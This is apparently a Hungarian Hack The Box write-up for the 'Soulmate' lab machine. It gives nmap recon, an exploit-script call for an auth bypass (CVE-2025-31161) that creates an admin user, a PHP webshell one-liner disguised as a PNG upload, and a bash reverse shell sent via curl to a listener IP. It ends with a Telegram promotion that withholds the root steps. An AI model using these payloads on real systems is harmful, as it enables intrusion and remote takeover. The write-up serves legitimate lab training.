Skip to content

Soulmate — Hack The Box

Platform: Linux
IP: 10.129.229.162
Nehézség: Easy
Szerző: NoSec


mélyebbre mennél? csatlakozz a backdoor crew-hoz és kapj exkluzív videókat & korai hozzáférést a root chainekhez.

💀 csatlakozz a backdoor crew-hoz

/etc/hosts szerkesztése

sudo sh -c '10.129.229.162 soulmate.htb ftp.soulmate.htb" >> /etc/hosts'

Recon – Szolgáltatás feltérképezés

Nmap

nmap -sVC soulmate.htb
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Soulmate - Find Your Perfect Match
|_http-server-header: nginx/1.18.0 (Ubuntu)

Foothold – Web sebezhetőség → RCE

Új vhost lett felfedezve: ftp.soulmate.htb

Ez sebezhető volt a CVE-2025-31161 (auth bypass) hibára.
Létrehozhatunk egy új admin felhasználót:

python3 cve-2025-31161.py \
  --target_host ftp.soulmate.htb \
  --port 80 \
  --target_user admin \
  --new_user nosec \
  --password 'Crush@123!'

Az admin panelen a feltöltött .png fájlok átnevezhetők .php-ra → klasszikus webshell feltöltés.

Webshell feltöltés

echo '<?php if(isset($_REQUEST["cmd"])) system($_REQUEST["cmd"]); ?>' > shell.png

Feltöltés → átnevezés → shell.php.

Teszt:

http://soulmate.htb/assets/images/profiles/shell.php?cmd=id

Reverse shell

rlwrap nc -lvnp 9001
curl "http://soulmate.htb/assets/images/profiles/shell.php?cmd=bash%20-c%20'bash%20-i%20%3E%26%20/dev/tcp/10.10.14.81/9001%200%3E%261'"

✅ Megvan a www-data shell.


🔐 A root rész csak a privát Telegram csoportban érhető el, amíg a gép aktív.
👉 Csatlakozz a teljes writeupért, extra tippekért és belsős tartalmakért:
📡 https://t.me/nosecpwn


☕ hívj meg egy kávéra, hogy ne aludjak el a következő writeup írása közben

💻 támogasd a nosec-et